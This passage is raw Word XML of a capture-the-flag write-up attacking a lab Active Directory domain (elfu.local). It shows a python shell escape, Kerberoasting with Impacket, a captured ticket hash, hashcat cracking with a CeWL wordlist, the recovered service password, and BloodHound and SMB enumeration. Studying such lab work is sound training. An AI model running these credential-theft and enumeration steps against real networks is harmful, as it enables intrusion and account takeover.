        <w:t xml:space="preserve">  open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldapssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A572499" w14:textId="281B9D81" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>3389/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wbt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46762F9C" w14:textId="3F0D5408" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00632029"/>
    <w:p w14:paraId="7D5D8102" w14:textId="3A4FFCAB" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00632029">
      <w:r>
        <w:t>The other subnets had a lot of hits. It mostly looks like 10.128.2.0/23 might be user workstations, so I moved on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CFD92" w14:textId="41362D69" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00632029">
      <w:r>
        <w:t>To keep testing, I wanted to get out of the python shell, so I tested the following shell upgrade technique:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5678F43A" w14:textId="4CC1A7B1" w:rsidR="00632029" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00632029">
        <w:t xml:space="preserve">mport </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00632029">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F04282D" w14:textId="2952AF15" w:rsidR="00632029" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00632029">
        <w:t>ty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00632029">
        <w:t>(“/bin/bash”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E95F6A" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00632029"/>
    <w:p w14:paraId="01C6B34B" w14:textId="7BF21A56" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00632029">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">It worked great! The grading script was set for the logon shell in </w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:r>
        <w:t>. Fortunately, the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>chsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” command to change the login shell worked with the provided account’s username and password. By changing the shell to </w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:t>, subsequent logons to the host started with a full shell session and did not rely on escaping the script and python shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34080EFF" w14:textId="03F1A0FE" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00632029">
      <w:r>
        <w:t xml:space="preserve">Based on the context of the challenge, hits, and associated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KringleCon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> presentations, I understood the next step was to begin enumerating this domain and finding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kerberoastable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9E565" w14:textId="6466A687" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00632029">
      <w:r>
        <w:t xml:space="preserve">The grades.elfu.org box we have access to does have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> installed</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094724D">
        <w:t>pwsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094724D">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Unfortunately, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Core does not have easy access like Windows clients to run commands like “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>aduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” so my first thought was to get to a Windows box—unfortunately</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t xml:space="preserve"> (for fortunately, for any other sane case on the planet)</w:t>
      </w:r>
      <w:r>
        <w:t>, running “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>enter-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>psession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” against the domain controller with my student credentials didn’t work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBF84F2" w14:textId="72344F2C" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00632029">
      <w:r>
        <w:t xml:space="preserve">I also attempted to RDP into the DC with my student credentials (stupider things have been possible…) by using an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094724D">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tunnel, but I received an access denied.</w:t>
      </w:r>
      <w:r w:rsidR="00466E80">
        <w:t xml:space="preserve"> This did validate, however, that my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00466E80">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00466E80">
        <w:t xml:space="preserve"> creds were valid on the domain (which I now know is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00466E80">
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00466E80">
        <w:t xml:space="preserve"> and the domain controller, according to its self-signed certificate, is named </w:t>
      </w:r>
      <w:r w:rsidR="00466E80" w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dc01.elfu.local</w:t>
      </w:r>
      <w:r w:rsidR="00466E80">
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I was still stuck on trying to do this from a place I was familiar with, on Windows environments, so I looked for more hosts that might do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psremoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by looking for open ports 3389, 5985, or 5986 that might let me log on with student creds—no luck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FADD9F" w14:textId="5C2175B5" w:rsidR="00466E80" w:rsidRDefault="00466E80" w:rsidP="00632029">
      <w:r>
        <w:t xml:space="preserve">Instead of worrying about enumerating everything, I figured I should first focus on getting access to another user, likely one that is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kerberoastable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. To do so, I intended to use the “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>getuserspns.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” script provided with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D7BCC">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="006D7BCC" w:rsidRPr="00BB1C6B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/SecureAuthCorp/impacket</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006D7BCC">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. I couldn’t get it directly from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the grades.elfu.org host, so I downloaded and zipped it locally and pushed it up via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7262420D" w14:textId="333B2263" w:rsidR="00466E80" w:rsidRDefault="00466E80" w:rsidP="00466E80">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Running the script was simple</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">: python3 getuserspns.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>exnruoveaz:Rgkiesvol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>@ -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>outputfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> out.txt -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.128.1.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA30B39" w14:textId="2AE6BED2" w:rsidR="006D7BCC" w:rsidRPr="006D7BCC" w:rsidRDefault="006D7BCC" w:rsidP="006D7BCC">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: The credentials for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> are reset daily and these credentials are no longer valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89B07F" w14:textId="1889FE32" w:rsidR="00466E80" w:rsidRDefault="00466E80" w:rsidP="00466E80">
      <w:r>
        <w:t>This returned a hash for the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu_svc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” account on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> domain. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01A091" w14:textId="5E846F7E" w:rsidR="00466E80" w:rsidRDefault="00466E80" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$e5be0dcae300237a7b74584ae75bfba3$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</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B61954" w14:textId="79F67C36" w:rsidR="00F917B3" w:rsidRDefault="00F917B3" w:rsidP="00466E80"/>
    <w:p w14:paraId="00081583" w14:textId="75B457A7" w:rsidR="00F917B3" w:rsidRDefault="00F917B3" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">We can attempt to crack this with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>—but first, there are several tips offered on doing so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22938746" w14:textId="48B43780" w:rsidR="00F917B3" w:rsidRDefault="00F917B3" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">The first hint was to use a rule with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/NotSoSecure/password_cracking_rules</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61A5E401" w14:textId="0AAD9113" w:rsidR="00F917B3" w:rsidRDefault="00F917B3" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">The second hint was that we could use a utility like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>CeWL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to generate a custom wordlist: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/digininja/CeWL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D4E0E62" w14:textId="28822B91" w:rsidR="00F917B3" w:rsidRDefault="006D7BCC" w:rsidP="00466E80">
      <w:r>
        <w:t>For wordlist creation, t</w:t>
      </w:r>
      <w:r w:rsidR="00F917B3">
        <w:t>he only relevant site I found was the register.elfu.org portal, but it turns out that it had a lot of items in comments in the source code that were still useful for generating a wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5884D76E" w14:textId="50A9469A" w:rsidR="00F917B3" w:rsidRDefault="00F917B3" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">Unfortunately, I was having difficulty running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directly against the register.elfu.org site. Instead of troubleshooting, I pulled down the page with </w:t>
      </w:r>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (using </w:t>
      </w:r>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>-L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to follow the redirect to the page with content) and saved the contents to a local file. I then used python’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to host a local copy of the registration page and ran </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> against that to create a proper wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403817E3" w14:textId="77777777" w:rsidR="007F48FB" w:rsidRDefault="00F917B3" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">With the wordlist, ruleset, and hash in hand, I was able to pass everything through to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to crack the hash:</w:t>
      </w:r>
      <w:r w:rsidR="007F48FB" w:rsidRPr="007F48FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906738A" w14:textId="5948281F" w:rsidR="00F917B3" w:rsidRDefault="007F48FB" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="007F48FB">
        <w:t>.\hashcat.exe -a 0 .\kerberoast.txt .\wlist.txt -r ..\OneRuleToRuleThemAll.rule.txt -O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0D0D6" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00466E80"/>
    <w:p w14:paraId="1C1B500E" w14:textId="40FE16E3" w:rsidR="00F917B3" w:rsidRDefault="007F48FB" w:rsidP="00466E80">
      <w:r>
        <w:t>This revealed that the password for “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu_svc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” was “Snow2021!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6106E7E6" w14:textId="78C3310B" w:rsidR="007F48FB" w:rsidRDefault="007F48FB" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">As a quick test, I checked to see if I could sign into the DC with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu_svc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> over RDP—still nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D755E" w14:textId="21D43F84" w:rsidR="007F48FB" w:rsidRDefault="007F48FB" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">I knew the next step was to enumerate the domain and see if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu_svc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> had any interesting access or paths to domain administrators. Presumably, as a domain admin we’d have more access to look around and access file shares with relevant data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695610D" w14:textId="0953335E" w:rsidR="007F48FB" w:rsidRDefault="007F48FB" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">I found a Linux compatible python implementation of Bloodhound’s collection features: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/fox-it/BloodHound.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44ABA5EB" w14:textId="04E967EF" w:rsidR="007F48FB" w:rsidRDefault="007F48FB" w:rsidP="006D7BCC">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="007F48FB">
        <w:t xml:space="preserve">python3 bloodhound.py -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F48FB">
        <w:t>elfu_svc@elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F48FB">
        <w:t xml:space="preserve"> -p Snow2021! -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F48FB">
        <w:t>elfu.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F48FB">
        <w:t xml:space="preserve"> -dc dc01.elfu.local </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="007F48FB">
        <w:t>zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A03D2EC" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00466E80"/>
    <w:p w14:paraId="2E0DF24B" w14:textId="7618A1CB" w:rsidR="007F48FB" w:rsidRDefault="007F48FB" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">I copied the zip file out of the grades.elfu.org server over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and loaded it into a local environment to open the results in Bloodhound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21204482" w14:textId="02C4FC56" w:rsidR="007F48FB" w:rsidRDefault="007F48FB" w:rsidP="00466E80">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">From the results, there was nothing immediately interesting about the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elfu_svc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account—certainly no immediate escalation paths to domain admins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535E60C5" w14:textId="5A111D2C" w:rsidR="007F48FB" w:rsidRDefault="007F48FB" w:rsidP="00466E80">
      <w:r>
        <w:t>There was another domain controller present—share30.elfu.local, but it couldn’t be resolved. I was not sure if this was offline or in some other segment we’d need to pivot to, since I hadn’t seen anything about it before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ADF27C" w14:textId="0E972D0F" w:rsidR="007F48FB" w:rsidRDefault="007F48FB" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">I started to play with the </w:t>
      </w:r>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ldap3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005558C2">
        <w:t xml:space="preserve">library for python and was able to successfully connect to dc01.elfu.local and run LDAP queries. However, without knowing anything interesting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005558C2">
        <w:t>elfu_svc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005558C2">
        <w:t xml:space="preserve"> could do and already having a Bloodhound export, there wasn’t much to do here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A83E36" w14:textId="49660052" w:rsidR="005558C2" w:rsidRDefault="005558C2" w:rsidP="00466E80">
      <w:r>
        <w:t xml:space="preserve">One hint was related to administrators hiding credentials in scripts. Clearly, I still was missing something obvious, so I figured I’d see if there was anything interesting in the DC’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysvol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folders. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has the </w:t>
      </w:r>
      <w:r w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>Get-GPPPassword.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> script to do this, which didn’t find anything. I reviewed the contents manually </w:t>
      </w:r>
      <w:r w:rsidR="00521837">
        <w:t xml:space="preserve">via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00521837" w:rsidRPr="006D7BCC">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00521837">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for any logon scripts or something else that an admin might have configured and got nothing.</w:t>
      </w:r>
    </w:p>
